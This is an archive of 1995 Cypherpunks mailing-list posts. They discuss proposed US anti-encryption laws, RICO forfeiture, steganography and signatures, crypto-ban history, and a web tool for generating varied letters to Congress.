Subject: Re:  Free The World Web Server project.. :)
Message-ID: <8AD5238.000300015E.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


DM> however, would be unobtrusive. A web page that mails a form letter to
DM> _your_ congressperson's form-letter-readers (ie staff readers) would be
DM> much better, IMHO.

  Expecially if the form letter generated would be randomly selected
from parallel word streams.  For example:

       Dear Senator <#SENATOR>:

       I am <concerned|alarmed|frightened> by the <attacks on privacy
     rights in|glaring First Amendment violations in|fascist mentality
     of|ominous provisions of|potential for civil rights infringement
     by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
     <#ORIGINATOR>.....

  You get the idea.

  Anyone who has read MAD Magazine could put such together. As an added
bonus, use variable margin settings, and none of the letters would be
exactly the same. Appropriate Imail => FAX software on a puter in DC
(local call that way) with the phone number of the sender filled in on
the top line for ID (izzat legal?) so it doesn't look like a form letter
at all.

  The web page would generate a random letter, allow the user to edit
it, further (possibly offering the alternate phrases) before he clicks
on the [Send] button.


 * Len Buckholtz of Borg:
LB> Quoting is irrelevant.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:09 PDT
To: CYPHERPUNKS@toad.com
Subject: DOJ Press Release, S. 974?
Message-ID: <8AD5238.000300015B.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


JY>    According to the Computer Emergency Response Team at
JY>    Carnegie Mellon University, during the past four years, the
JY>    number of reported intrusions on the Internet has increased

  In the wake of the Rimm Job, any study from CMU is suspect.


 * Bad Borg, Bad Borg:
Whatcha gon' do? Whatcha gon' do when they 'simlate you?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 09:04:04 PDT
To: CYPHERPUNKS@toad.com
Subject: Stego Standards Silly ? (
Message-ID: <8AD5238.000300015F.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


LM> The standard answer to agent-in-the-middle tampering is of
LM> course digital signatures. Now, the question is, will we be allowed to sign
LM> our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
LM> can't forge our signatures ? Obviously the signature itself can't be
LM> stegoed, or else we fall into an infinite regress.

  Not obvious at all. You encrypt and sign as usual, stego the resultant
output, and perhaps include in the stego routines some kind of CRC or
hash if you like. But the point is that the signature still works to
indicate whether the message was tampered with or not.

  If we posit a MITM, he can tamper with cyphertext =or= stegotext, but
he can't defeat the signature. I would recieve a GIF which my stego
software would turn into a file that PGP would puke on, telling me that
Someone Is Messing With My Mail.

  I would not, of course, be able to reveal this fact directly. However,
I could ask my correspondent to re-send the GIF, and when it comes out
different in EVERY SINGLE LSB, I have proof of tampering.

 * Support legislation for a waiting period on taglines.......
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 16 Jul 95 09:35:05 PDT
To: cypherpunks@toad.com
Subject: RICO and Asset Forfeitures
Message-ID: <ac2e8d33170210048e56@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 7/16/95, Andrew Spring wrote:
>>ranked as a mobster subject to RICO.  My guess is that the intent is that
>>from one placement on an FTP server or one posting to a newsgroup, the
>>perpetrator of that heinous act will have passed his RICO qualification and
>>therefore be subject to having all he owns taken from him.
>
>RICO question:  i thought that the idea of RICO is to confiscate assets of
>racketeers that are derived from criminal activities.  PGP and remailer
>software is distributed free.  so would RICO seizures even apply (yes I
>know this doesnt' always stop the FBI)?

As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act,
though the euphonious "Rico," a la South American drug kingpins, is the
real reason for the name), only the assets imputed to the illegal act can
be seized. Thus, boats, factories, houses, etc., that are imputed
(believed, claimed) to have been bought partially or wholly from funds from
illegal acts can be seized.

Civil penalties are another matter. If you're charged with distributing
something illegal and a fine of $250,000 is levied, then you may have to
sell everything you own to pay it, but it's not a RICO seizure.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 16 Jul 95 10:22:36 PDT
To: cypherpunks@toad.com
Subject: Re: unix, vanguard
Message-ID: <199507161720.KAA16734@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>If you want to do something like Raph's remailer list, would you rather
>implement it on a pc running windows or with a perl script on a unix 
>box?

Not to prolong this argument, which hopefully won't turn into a lengthy OS
debate, but this argument boils down to the "users vs. developers" situation.

Sure, remailers and remailer lists are better implemented under unix, and
there may be as many as what, 50 people (developers) in the world interested
in doing this? On the other hand, several times that number of users will
access the information and actually give it value; they (users) don't need
unix at all.

Maybe I'm a market share bigot, but to me, if you want to spread crypto to
the masses, you have to do it with tools that run on the platforms the
masses use.

Who knows, perhaps in the future we'll see that the tools, programs, and
front ends run on more popular operating systems, and the relatively fewer
servers and scripts run on unix.

--
Karl L. Barrus <klbarrus@infocom.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 16 Jul 95 09:24:54 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Ack!  It's not my fault!
Message-ID: <Pine.ULT.3.91.950716112354.29821C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Before anybody flames me too bad, I want to poitn out that I only posted 
the PineSign script ONCE.  I don't know why it showed up multiple times.

Most weird.  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAk9cDokqlyVGmCFAQFNaAQAvELOLo9wazD7Tfyl/fyg3Z4wLxdJCXSt
+O61LYzqlzx45+Y7AG3KNiW3GgZFSnJkaUT+dfSpNs7p0M24ruTGYRxnPE0r0+Nk
TrUkPCG4o3YR/azpxq/PzVp2TiOaRL3SyEaSHvNGrSj6nVGLYuosYckylzRpJp/S
WkCcAUqlKg4=
=zbEG
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 16 Jul 95 08:31:04 PDT
To: cypherpunks@toad.com
Subject: PGP-integrated mail readers (was Re: Deployment)
In-Reply-To: <Pine.3.89.9507161551.A1196-0100000@unicorn.com>
Message-ID: <199507161531.LAA27343@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 16 Jul 95 08:58:06 PDT
To: cypherpunks@toad.com
Subject: G0D_dim
Message-ID: <199507161558.LAA10839@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-16-95. NYPaper:


   "The Spies' Code and How It Broke. The Russians had a
   problem: it's almost impossible to be perfectly random.

      The Russians suffered from a lapse in quality control.
      They inadvertently let some pattern find its way into
      their scrambled codes, a loose thread that allowed
      American code breakers to unravel the scheme. "Given a
      pure, perfect one-time system, you're not going to break
      it," said David Kahn, visiting historian at the N.S.A.'s
      Center for Cryptologic History.                RAN_dum


   "Twilight of the Nukes. The post-war years were spent
   hoarding nuclear weapons. Now it's time to put them away."

      Since that first nuclear test the United States has
      built 70,000 nuclear weapons of almost every conceivable
      kind: warheads, artillery shells, land mines, depth
      charges and even backpack-style plutonium explosives
      weighing 58 pounds but equivalent to 10 tons of TNT. But
      now it is the twilight of the nukes. They are being
      taken apart by the United States and the Soviet Union at
      the rate of 10 or 12 a day, and the new problem is how
      to keep track them of all.                     TWI_god



   >1:  G0D_dim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 16 Jul 95 09:43:07 PDT
To: cypherpunks@toad.com
Subject: ecm list
Message-ID: <9507161642.AA20001@toast>
MIME-Version: 1.0
Content-Type: text/plain



It may be necessary to remove the ECM mailing list from the MIT
computers (no big surprise here).  The issue isn't the overwhelming
traffic volume on the list; rather, the concern that it might violate
some MIT regulation.

If anyone wants to take it on, please contact me ASAP.

Thanks,
Rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 16 Jul 95 04:52:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01510104ac2d9af1127e@[193.74.217.19]>
MIME-Version: 1.0
Content-Type: text/plain



>ranked as a mobster subject to RICO.  My guess is that the intent is that
>from one placement on an FTP server or one posting to a newsgroup, the
>perpetrator of that heinous act will have passed his RICO qualification and
>therefore be subject to having all he owns taken from him.

RICO question:  i thought that the idea of RICO is to confiscate assets of
racketeers that are derived from criminal activities.  PGP and remailer
software is distributed free.  so would RICO seizures even apply (yes I
know this doesnt' always stop the FBI)?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sun, 16 Jul 95 11:10:45 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <DyFc9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" <perry@imsi.com> writes:

> > What we can do, however, is to shape the culture of the net.  That
> > culture will have to eventually be listened to by DC.
> 
> The beltway crowd doesn't log in. They ignored the petitions sent to
> Leahy for S.314 because they didn't think of the people who sent the
> petitions in as "real". I doubt they will understand the net for many
> years to come, whereas we have to stall out the NSA and company now.

We need to use e-mail/fax gateways that strip much of the e-mail headers. For
some reason, fax has become so ubiquitous in U.S. businesses (including
Congress) that it has become "mainstream" and creditable.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAlVVt74r4kaz3mVAQFbRQP/dUY0tqbis9Up7sVDt6ydCpO93ZMhtSbd
nUHtXd3+FCf7Phur7w8YMMY5I/VoMCpk9NLu7j9aeYMDtyWupj+Lj9d+wlFhuWHb
bSRr7Y6xvqnbY1mHME0wgRx4FIDinudgG+n/XetaVlQHqQ68YrYsRcCmvt22j0eL
ovPoF92ECyc=
=k7LM
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-885-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 16 Jul 95 11:22:35 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507161819.OAA06090@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

PLEASE NOTE: IANAL either [yet] But,

MONTY HARDER wrote:

>     [Please do not start an abortion flamefest on the list. If you want
>     to argue it via Imail, I can handle that, but let's not bother the
>     rest of the class, OK?]

I agree, and this post has nothing to do with that controversy [I hope].

>
>  The Supremes found the right to have an abortion in some kind of
>"penumbral" right to <BOLD> privacy </BOLD>, which in turn came from
>Griswold v. Connecticut, if organic RAM serves. Given this precedent,
>may we challenge anti-crypto crap such as the Grassley Bill as a
>violation of the right to privacy?

Good idea, but I have an idea to upset even *more* people.
First of all, has anyone else noticed how the Republicans have placed
life-and-death emphasis lately on the oft-ignored 10th Amendment.

Amendment X -- "The powers not delegated to the United States by the
Constitution, nor prohibited by it to the States, are reserved to the
States respectively, or to the people."

IMO, the Republicans will continue to do this as long as they can win
the overwhelming majority of governorships, which is for the foreseeable
future. Democrats, of course, don't like this and prefer unconstrained
federal power [preferably in the hands of someone other than Newt, though].
There is, however, another Amendment which goes beyond being oft-ignored 
to the status of being truly forgotten, without ever having been repealed.

Amendment IX -- "The enumeration in the Constitution of certain rights
shall not be construed to deny or disparage others retained by the people."

[The right to write code was among many rights NOT enumerated.]

Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary
reason *I* like it so much. Various lawyers, judges, and [especially]
law professors will sputter that the 9th is "impertinent!" or "irrelevant!" 
and should be ignored, and Jim Ray is just spouting off [again] about the
slow erosion of freedom in this country. My rejoinder is "OK, if we're
supposed to ignore it, why not just REPEAL it, after all, it's just sitting
there doing nothing, cluttering up the rest of the Bill of Rights." Usually,
conversation [and, I suspect, my eventual grade] degenerates at this point.
Those C-punks not in law school, however, should keep the 9th in mind when
talking about Constitutional issues on encryption rights, if for no other
reason than to educate the public. In court, of course, I would concentrate
on the 1st. Apologies to the various lurking law professors on the list, I
am not talking about you. Also, this diatribe is mere academic speculation
and not a legal opinion and IANAL and I have been known to be wrong in the
past and I no-doubt will be wrong again in the future and most people in 
the legal profession think this is wrong so don't rely on it and your lawyer
will think you are crazy if you say this to him (so don't) and so on and
so on...
JMR
>
>
<snip>
Regards, Jim Ray
"It is dangerous to be right when the government is wrong." Voltaire
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAlYGCoZzwIn1bdtAQFAvAF/U/0u/BjNThGjDeeOsv5CujcJcFBKf5Hx
+SsUFAwYyD5I5DWosWA0iTZesc/DO3UR
=bAZm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 16 Jul 95 13:05:20 PDT
To: cypherpunks@toad.com
Subject: A Chronology on crypto bans
Message-ID: <v01520d00ac2f1c6c99eb@[204.91.138.82]>
MIME-Version: 1.0
Content-Type: text/plain


Someone asked why is there such a flurry recently on banning crypto in
recent months. This is not a recent issue. There have been almost non-stop
attempts for the last 15 years.

I've been finishing up this chapter in the book Bruce Schneier and I are
writing on crypto battles. Every so often a new FOIA document floats in
from some request I made 3-4 years ago hat makes me have to revise it
again. Here
s a small chronology based on the chapter.

------

Attempts to ban encprytion 1977-1995



1977-1980 NSA Director Inman calls crypto born secret. Should be restricted.
Attempts to use Invention Secrecy Act of 1951 to patent inventions by
academic researchers. Attempts to use export control laws to limit
scientific discussion.
NSA Threates NSF over grants for crypto studies.

1981 American Council on Education committee recommends voluntary
submissions of cryto papers to NSA

1984 National Security Decision Directive 145. Gave NSA authority over all
govt crypto and computer security development.

1986 NSTISSP. Attempted to extend NSDD-145 to private sector. USe to
justify visits to LEXIS/NEXIS, Dialog, public libraries etc.

1987 Congress passes Computer Security Act. Gives crypto authority to NIST.

1989 NIST signs MOU with NSA giving back authority to NSA.  NIST starts
development of new public key system to do both signatures and key
exchange.

1990 After pressure by NSA. NIST adopts El Gamal for signatures only. NSA
secreatly designs "algorithm on a chip" for key exchange. FBI, NSA and NIST
also begin "National Cryptgraphic Review".

1991 FBI asks Senator Joseph Biden to introduce "Sense of Congress" to
recommend backdoors in all encpryption, telephone systems. Provision
removed after public outcry. Later evolves into digital telephony proposal.
October 1991, NSA, FBI, CIA meet to discuss possible legislation on
encryption.

1992 NIST memo - "FBI working on draft legislation to control and liscense
all cryptography"

1993 Clipper Proposal introduced. Interagency working group formed by
Presidential Review Directive 27. According to NSA memo on IWG "FBI
proposed legislation to authorize the FCC to regulate common carriers, PBX
operators, and  manufacturers of encryption devices available for use in
the US  to ensure such systems and devices are compatable with law
enforcement electronic surveillance interests....the interagency working
group revied proposed legislation and concluded that ....legislation to
authorize regulation of encryption product manufacturers would be
considerably more difficult [than passing the digital telephone proposal]
and required further study." 6 options were discussed including prohobiting
all other encprytion besides Clipper. The other five have been classified
"top secret".

--------

Dave


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dshayer@netcom.com> (David Shayer)
Date: Sun, 16 Jul 95 17:22:43 PDT
To: cypherpunks@toad.com
Subject: Esther Dyson in NYT
Message-ID: <v02120d01ac2f2d3ea33c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Todays (sunday 7-16-95) NYT Magazine has an excellent (IMHO) article by
Esther Dyson on why the government should not regulate the net.  Its not
written for techies like us, its written for normal non-wired people, like
our parents and our senators.

The article is clear, easy to follow, makes it points well, and refrains
from overused analogies about highways and roadkill.  So next time you're
at a loss for words arguing with some clueless offline luser about why porn
and pedophiles really aren't  rampant all over the net, show them this
article.

David


+------------------------------------------------------------------------+
|David Shayer                                 dshayer@netcom.com         |
|Sentient Software / Symantec                                            |
|"Spam is not a verb."                                                   |
+------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 16 Jul 95 17:37:45 PDT
To: CYPHERPUNKS@toad.com
Subject: Mods to Dining Cryptographers: legal questions...
Message-ID: <8AD5422.000300016A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PF> spend on software patents. I don't, and don't mean to say that _he_
PF> goes around stealing ideas from other people and patenting them.)
PF>
PF> How do I do this and protect myself from the people who do have the
PF> money to go through the intellectual property courthouse game?

  IANAL, but... Create a detatched signature certificate of your idea,
and post =that= here. Get some of us to sign it


       I, _______, a resident of _______ County, __________, do hereby
     attest that I recieved the above certificate on _____ ___,1995.

                [plaintext for non-crypto-aware folks]

and email to you. Also, make two hard copies, including hard copies of
our notarizations you recieve back . Put one of them in an envelope with
a 3.5" floppy of everything, and address the =back= to yourself. Go into
the post office, and ask the clerk to hand-cancel the envelope, so that
the cancellation goes half across the flap and the rest on the envelope.
When you get this from yourself in the mail, you put it in your safety-
deposit box or equivalent.

  This way, when you open the envelope in the presence of the Judge/Jury
you have the word of the US Postal Service that you had X idea on Y
date, not to mention the corroborrating e-signatures. If Z were to claim
authorship, you could ask Z to prove it by forging your signature on
another document. This could go a long way toward proving the value of
PGP signature to the Unwashed Masses, =and= illustrate the danger of
GACK + corrupt gummit agent (in the light of the Ruby Ridge and Waco
hearings, people will be =quite= sensitive to the fact that agents can
and do abuse their power).

  In fact, the ability for us to be able to attest to your possession of
Document X on Date Y, without any of us ever seeing X itself, is one of
the most powerful uses of digital signatures. I can see Phil Z. being
called as an expert witness, to establish the mechanism involved.  Joe
Sixpack needs to hear Dan Blather mention this on the Evening News. OK,
not Blather, but Koppel would do it. Maybe even John Stossel on 20/20.

  This is what we need to be pushing to the Luddite crowd: The very new
technology that frightens them, because they percieve it as out of their
control, brings with it new means for people to take control. Even if
you lost your case on some other grounds, it would be one of the best PR
bits for PGP I can think of.



 * Don't say "Gun Control", it's "Victim Disarmament".
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Thompson <stevet@smeg.net4.io.org>
Date: Sun, 16 Jul 95 16:34:36 PDT
To: Bolivar Shagnasty <tj@compassnet.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Chameleon.4.01.2.950715030350.tj@tjunker.compassnet.com>
Message-ID: <Pine.LNX.3.91.950716174244.1168B-100000@smeg.net4.io.org>
MIME-Version: 1.0
Content-Type: text/plain



Wish I could be more optimistic....

On Sat, 15 Jul 1995, Bolivar Shagnasty wrote:
> Perry Metzger wrote:
> 
> >"Robert A. Hayden" writes:
> >> We've seen the enemy, that the are the 535 senators and representatives 
> >> in D.C., and the staff in the White House.  It's time to shore up our 
> >> allies and enter the battle witht he best weapons we have; information 
> >> and popular use.

[snippage]

> Would it be more productive to hire the white shoes or start another few ISPs 
> and shepherd the new users to be privacy-aware letter writers and faxers?  
> Educate your ISPs.  Any ISP that isn't political in this age is brain 
> dead and dead weight.  Any ISP that sees its political interests as somehow 
> different than those of its users (recent lobbying to shift burdens away 
> from national services and onto users, and recent AOL admissions of 
> participation in what sounded like entrapping users) is worse than brain dead 
> -- it's part of the problem.

Speaking for an ISP startup (unoficially :), we're planning to get a 
small startup going within the next few weeks.  Being the technical 
brains behind the company (at least pertaining to the Internet), and 
having a strong idealistic streak, I assure you that I, for one, will be 
exerting as much effort as I can to promote cryptographic awareness for 
the users that subscribe.

Besides running the MixMaster software, I am going to devote a local 
newsgroup to the topic and hold an ongoing tutorial/Q&A session on the 
uses of crypto software.  I'll probably be posting some messages from 
this forum there as appropriate.

I'd like to do something neat like offer mail-drop type accounts -- 
accessable via telnet/POP/IMAP -- for e$, perhaps.

Being in Canada, I think I may have a little more time to get this sort 
of thing entrenched (on my system at least) than you do in the states, 
though I suspect that Uncle Sam may not even notice the border if they 
decide to get heavy-handed.  Perhaps I'm dreaming.

I am depressed at the direction the world is heading.  The issue to me 
seems to be how bad the totalitarianism will get since I think it's 
already here.  I'd really like to be able to move to another country... 
It might buy me ten to twenty years of breathing room before the United 
States encompasses the world.

If anyone gets ahold of any tickets on a rocket off this planet, would 
they please give me a call?
 
> Bolivar

Regards,

Steve Thompson, Internet Consultant at large -- stevet@smeg.net4.io.org
=======================================================================
To the sane mind, even aggression against people is infinitely better
than aggression against infinity. And it is the chief defect of sane
society that it is boring. It is so boring that even sane people
notice it. And so, from time to time, there is a war. This is intended
to divert people's minds before they become so bored that they take to
some impersonal kind of aggressive activity -- such as research, or
asceticism, or inspiration, or something discreditable of that kind.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 16 Jul 95 15:19:36 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: Mods to Dining Cryptographers: legal questions...
Message-ID: <ac2ef6f7130210049cda@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>I'm sorry if I was a little mysterious about my reference to
>another use or mode of a DC-net; I'd _love_ to tell the rest of
>you flat-out, and put the idea in the public domain, but I'm
>not sure I _CAN_.
>

You should investigate an idea known as the provisional patent that is
relatively new to the United States. They're supposedly shorter and
designed to give you some claim to the ideas as well as some time to
develop them enough to file a real patent. I can't give you any other
advice except to tell you that my patent agent is also curious about them
because they're new.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sun, 16 Jul 95 17:13:25 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <199507170016.TAA23019@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>  Expecially if the form letter generated would be randomly selected
>from parallel word streams.  For example:
>
>       Dear Senator <#SENATOR>:
>
>       I am <concerned|alarmed|frightened> by the <attacks on privacy
>     rights in|glaring First Amendment violations in|fascist mentality
>     of|ominous provisions of|potential for civil rights infringement
>     by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
>     <#ORIGINATOR>.....
>
>  You get the idea.
>
>  Anyone who has read MAD Magazine could put such together. As an added
>bonus, use variable margin settings, and none of the letters would be
>exactly the same. Appropriate Imail => FAX software on a puter in DC
>(local call that way) with the phone number of the sender filled in on
>the top line for ID (izzat legal?) so it doesn't look like a form letter
>at all.
>
>  The web page would generate a random letter, allow the user to edit
>it, further (possibly offering the alternate phrases) before he clicks
>on the [Send] button.
>

If someone in the DC area wants to set up such a system, I'll gladly donate
an Intel SatisFAXion 200 fax/modem, complete with manuals, etc.

This would be a Good Thing, IMHO.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Sun, 16 Jul 95 13:50:22 PDT
To: cypherpunks@toad.com
Subject: "Just write code"
Message-ID: <9507162034.AA28228@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>Just write code.  For whatever platform you like writing code for.

And while you're at it, make it as platform-independent as possible.

Porting to another platform or system involves writing code, no?

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ENRIQUE S. IGNARRA" <S0496872@DOMINIC.BARRY.EDU>
Date: Sun, 16 Jul 95 17:53:59 PDT
To: cypherpunks@toad.com
Subject: PGP FAQ
Message-ID: <01HSY9PP2ZSI000DND@DOMINIC.BARRY.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Could someone here politely send me some email on where i could get an updated
PGP FAQ?  I have an old one for v2.3a.  I'd like to get an updated one.
But where the old one says to go, the directory no longer exists.

Thanks!

Enrique
s0496872@dominic.barry.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sun, 16 Jul 95 18:46:50 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <751c9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

liberty@gate.net (Jim Ray) writes:

> Amendment IX -- "The enumeration in the Constitution of certain rights
> shall not be construed to deny or disparage others retained by the people."
> 
> [The right to write code was among many rights NOT enumerated.]
> 

Most importantly, it includes the right to decide what the other unenumerated
rights are.....



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMAm//N74r4kaz3mVAQHMJAP/RTmdhZc63J6XzL8FfKK6wk9RrXgcOZ4c
kZHGqYzOo0ZJKbmsugOwEjerpGsbeIUu3SzM+vrVA+BaWHLaufELSmh7AQW4/FcY
XyKv3Zu/JBBxEca+H0qbix/q433c+2r2iKJ1p8p1c8jgK/L+c66cJiTgWGMt2vPZ
XBBMaYAOIUg=
=DQyv
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@voxbox.norden1.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
   Internet consulting, HTML programing, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 16 Jul 95 19:55:38 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: RICO and Asset Forfeitures
In-Reply-To: <ac2e8d33170210048e56@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950716225303.13023C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 16 Jul 1995, Timothy C. May wrote:

> At 12:59 PM 7/16/95, Andrew Spring wrote:
> >>ranked as a mobster subject to RICO.  My guess is that the intent is that
> >>from one placement on an FTP server or one posting to a newsgroup, the
> >>perpetrator of that heinous act will have passed his RICO qualification and
> >>therefore be subject to having all he owns taken from him.
> >
> >RICO question:  i thought that the idea of RICO is to confiscate assets of
> >racketeers that are derived from criminal activities.  PGP and remailer
> >software is distributed free.  so would RICO seizures even apply (yes I
> >know this doesnt' always stop the FBI)?
> 
> As I understand RICO (Racketeer-Influenced and Corrupt Organizations Act,
> though the euphonious "Rico," a la South American drug kingpins, is the
> real reason for the name), only the assets imputed to the illegal act can
> be seized. Thus, boats, factories, houses, etc., that are imputed
> (believed, claimed) to have been bought partially or wholly from funds from
> illegal acts can be seized.
>
Assets directly traceable to criminal activity can be forfeited in a 
civil proceeding.  "Substitute assets" (when the assets obtained 
directly from the criminal activity have been dissipated or just can't be 
found) can be forfeited in a criminal forfeiture (that is, as part of an 
indictment...).
 
> Civil penalties are another matter. If you're charged with distributing
